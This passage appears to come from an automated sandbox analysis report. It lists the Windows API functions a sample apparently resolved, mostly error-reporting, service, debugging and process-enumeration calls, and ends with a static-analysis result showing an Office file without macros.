642. "cryptsp.dll.CryptExportKey",
643. "cryptsp.dll.CryptCreateHash",
644. "kernel32.dll.SwitchToThread",
645. "rpcrt4.dll.UuidFromStringW",
646. "rpcrt4.dll.RpcBindingCreateW",
647. "rpcrt4.dll.RpcBindingBind",
648. "sechost.dll.OpenSCManagerW",
649. "sechost.dll.OpenServiceW",
650. "sechost.dll.StartServiceW",
651. "sechost.dll.CloseServiceHandle",
652. "sechost.dll.LookupAccountNameLocalW",
653. "advapi32.dll.LookupAccountSidW",
654. "sechost.dll.LookupAccountSidLocalW",
655. "ole32.dll.CoInitializeSecurity",
656. "w32time.dll.SvchostEntry_W32Time",
657. "w32time.dll.SvchostPushServiceGlobals",
658. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
659. "ws2_32.dll.#115",
660. "ws2_32.dll.#111",
661. "userenv.dll.RegisterGPNotification",
662. "gpapi.dll.RegisterGPNotificationInternal",
663. "sechost.dll.QueryServiceConfigW",
664. "dsrole.dll.DsRoleGetPrimaryDomainInformation",
665. "dsrole.dll.DsRoleFreeMemory",
666. "sspicli.dll.LsaRegisterPolicyChangeNotification",
667. "w32time.dll.TimeProvClose",
668. "w32time.dll.TimeProvCommand",
669. "w32time.dll.TimeProvOpen",
670. "ws2_32.dll.getaddrinfo",
671. "ws2_32.dll.freeaddrinfo",
672. "ws2_32.dll.#23",
673. "ws2_32.dll.WSAEventSelect",
674. "vmictimeprovider.dll.TimeProvClose",
675. "vmictimeprovider.dll.TimeProvCommand",
676. "vmictimeprovider.dll.TimeProvOpen",
677. "advapi32.dll.EventRegister",
678. "advapi32.dll.EventEnabled",
679. "advapi32.dll.EventWrite",
680. "ws2_32.dll.WSAAddressToStringW",
681. "ws2_32.dll.#3",
682. "ws2_32.dll.#116",
683. "advapi32.dll.EventUnregister",
684. "sspicli.dll.LsaUnregisterPolicyChangeNotification",
685. "userenv.dll.UnregisterGPNotification",
686. "gpapi.dll.UnregisterGPNotificationInternal",
687. "wersvc.dll.ServiceMain",
688. "wersvc.dll.SvchostPushServiceGlobals",
689. "faultrep.dll.WerpInitiateCrashReporting",
690. "wer.dll.WerpCreateMachineStore",
691. "shell32.dll.SHGetFolderPathEx",
692. "userenv.dll.CreateEnvironmentBlock",
693. "sspicli.dll.GetUserNameExW",
694. "userenv.dll.DestroyEnvironmentBlock",
695. "wer.dll.WerpSvcReportFromMachineQueue",
696. "advapi32.dll.DuplicateToken",
697. "wtsapi32.dll.WTSQueryUserToken",
698. "winsta.dll.WinStationQueryInformationW",
699. "advapi32.dll.CreateWellKnownSid",
700. "rpcrt4.dll.RpcStringBindingComposeW",
701. "rpcrt4.dll.RpcBindingFromStringBindingW",
702. "rpcrt4.dll.RpcStringFreeW",
703. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
704. "rpcrt4.dll.NdrClientCall3",
705. "advapi32.dll.ImpersonateLoggedOnUser",
706. "advapi32.dll.CreateProcessAsUserW",
707. "advapi32.dll.RevertToSelf",
708. "imm32.dll.ImmDisableIME",
709. "wer.dll.WerpCreateIntegratorReportId",
710. "wer.dll.WerReportCreate",
711. "wer.dll.WerpSetIntegratorReportId",
712. "wer.dll.WerReportSetParameter",
713. "dbgeng.dll.DebugCreate",
714. "ntdll.dll.CsrGetProcessId",
715. "ntdll.dll.DbgBreakPoint",
716. "ntdll.dll.DbgPrint",
717. "ntdll.dll.DbgPrompt",
718. "ntdll.dll.DbgUiConvertStateChangeStructure",
719. "ntdll.dll.DbgUiGetThreadDebugObject",
720. "ntdll.dll.DbgUiIssueRemoteBreakin",
721. "ntdll.dll.DbgUiSetThreadDebugObject",
722. "ntdll.dll.NtAllocateVirtualMemory",
723. "ntdll.dll.NtClose",
724. "ntdll.dll.NtCreateDebugObject",
725. "ntdll.dll.NtCreateFile",
726. "ntdll.dll.NtDebugActiveProcess",
727. "ntdll.dll.NtDebugContinue",
728. "ntdll.dll.NtFreeVirtualMemory",
729. "ntdll.dll.NtOpenProcess",
730. "ntdll.dll.NtOpenThread",
731. "ntdll.dll.NtQueryInformationProcess",
732. "ntdll.dll.NtQueryInformationThread",
733. "ntdll.dll.NtQueryMutant",
734. "ntdll.dll.NtQueryObject",
735. "ntdll.dll.NtRemoveProcessDebug",
736. "ntdll.dll.NtResumeThread",
737. "ntdll.dll.NtSetInformationDebugObject",
738. "ntdll.dll.NtSetInformationProcess",
739. "ntdll.dll.NtSystemDebugControl",
740. "ntdll.dll.NtWaitForDebugEvent",
741. "ntdll.dll.RtlAnsiStringToUnicodeString",
742. "ntdll.dll.RtlCreateProcessParameters",
743. "ntdll.dll.RtlCreateUserProcess",
744. "ntdll.dll.RtlDestroyProcessParameters",
745. "ntdll.dll.RtlDosPathNameToNtPathName_U",
746. "ntdll.dll.RtlFindMessage",
747. "ntdll.dll.RtlFreeHeap",
748. "ntdll.dll.RtlFreeUnicodeString",
749. "ntdll.dll.RtlGetFunctionTableListHead",
750. "ntdll.dll.RtlGetUnloadEventTrace",
751. "ntdll.dll.RtlGetUnloadEventTraceEx",
752. "ntdll.dll.RtlInitAnsiString",
753. "ntdll.dll.RtlInitUnicodeString",
754. "ntdll.dll.RtlTryEnterCriticalSection",
755. "ntdll.dll.RtlUnicodeStringToAnsiString",
756. "ntdll.dll.NtOpenProcessToken",
757. "ntdll.dll.NtOpenThreadToken",
758. "ntdll.dll.NtQueryInformationToken",
759. "kernel32.dll.CloseProfileUserMapping",
760. "kernel32.dll.CreateToolhelp32Snapshot",
761. "kernel32.dll.DebugActiveProcessStop",
762. "kernel32.dll.DebugBreak",
763. "kernel32.dll.DebugBreakProcess",
764. "kernel32.dll.DebugSetProcessKillOnExit",
765. "kernel32.dll.Module32First",
766. "kernel32.dll.Module32FirstW",
767. "kernel32.dll.Module32Next",
768. "kernel32.dll.Module32NextW",
769. "kernel32.dll.OpenThread",
770. "kernel32.dll.Process32First",
771. "kernel32.dll.Process32FirstW",
772. "kernel32.dll.Process32Next",
773. "kernel32.dll.Process32NextW",
774. "kernel32.dll.ProcessIdToSessionId",
775. "kernel32.dll.SetProcessShutdownParameters",
776. "kernel32.dll.Thread32First",
777. "kernel32.dll.Thread32Next",
778. "kernel32.dll.GetTimeZoneInformation",
779. "kernel32.dll.DuplicateHandle",
780. "kernel32.dll.Wow64GetThreadSelectorEntry",
781. "advapi32.dll.CloseServiceHandle",
782. "advapi32.dll.ControlService",
783. "advapi32.dll.CreateServiceA",
784. "advapi32.dll.CreateServiceW",
785. "advapi32.dll.DeleteService",
786. "advapi32.dll.EnumServicesStatusExA",
787. "advapi32.dll.EnumServicesStatusExW",
788. "advapi32.dll.GetEventLogInformation",
789. "advapi32.dll.OpenSCManagerA",
790. "advapi32.dll.OpenSCManagerW",
791. "advapi32.dll.OpenServiceA",
792. "advapi32.dll.OpenServiceW",
793. "advapi32.dll.StartServiceA",
794. "advapi32.dll.StartServiceW",
795. "advapi32.dll.GetSidSubAuthority",
796. "advapi32.dll.GetSidSubAuthorityCount",
797. "version.dll.GetFileVersionInfoSizeExW",
798. "version.dll.GetFileVersionInfoExW",
799. "dbghelp.dll.WinDbgExtensionDllInit",
800. "dbghelp.dll.ExtensionApiVersion",
801. "wer.dll.WerpSetDynamicParameter",
802. "wer.dll.WerReportAddDump",
803. "wer.dll.WerpSetCallBack",
804. "wer.dll.WerReportSetUIOption",
805. "wer.dll.WerpAddRegisteredDataToReport",
806. "wer.dll.WerReportSubmit",
807. "user32.dll.LoadStringW",
808. "advapi32.dll.RegCreateKeyExW",
809. "sensapi.dll.IsNetworkAlive",
810. "user32.dll.CharUpperW",
811. "wer.dll.WerpAddAppCompatData",
812. "apphelp.dll.SdbGetFileAttributes",
813. "apphelp.dll.SdbFormatAttribute",
814. "apphelp.dll.SdbFreeFileAttributes",
815. "dbghelp.dll.MiniDumpWriteDump",
816. "kernel32.dll.GetLongPathNameA",
817. "kernel32.dll.GetLongPathNameW",
818. "kernel32.dll.GetProcessTimes",
819. "advapi32.dll.RegOpenKeyExA",
820. "advapi32.dll.RegQueryValueExA",
821. "powrprof.dll.CallNtPowerInformation",
822. "version.dll.GetFileVersionInfoSizeA",
823. "version.dll.GetFileVersionInfoA",
824. "version.dll.VerQueryValueA",
825. "verifier.dll.VerifierEnumerateResource",
826. "ntdll.dll.NtSuspendProcess",
827. "ntdll.dll.NtResumeProcess",
828. "advapi32.dll.QueryTraceW",
829. "advapi32.dll.IsValidSid",
830. "advapi32.dll.GetLengthSid",
831. "advapi32.dll.CopySid",
832. "advapi32.dll.AddAccessAllowedAceEx",
833. "wer.dll.WerpGetStoreLocation",
834. "wer.dll.WerpGetStoreType",
835. "wer.dll.WerReportCloseHandle",
836. "user32.dll.MsgWaitForMultipleObjects",
837. "wer.dll.WerpFreeString",
838. "user32.dll.GetProcessWindowStation",
839. "user32.dll.GetThreadDesktop",
840. "user32.dll.GetUserObjectInformationW",
841. "werui.dll.WerUICreate",
842. "werui.dll.WerUIStart",
843. "werui.dll.WerUITerminate",
844. "werui.dll.WerUIDelete"
845. ]
846.  
847. [*] Static Analysis: {
848. "office": {
849. "Metadata": {
850. "HasMacros": "No"
851. }
852. }
853. }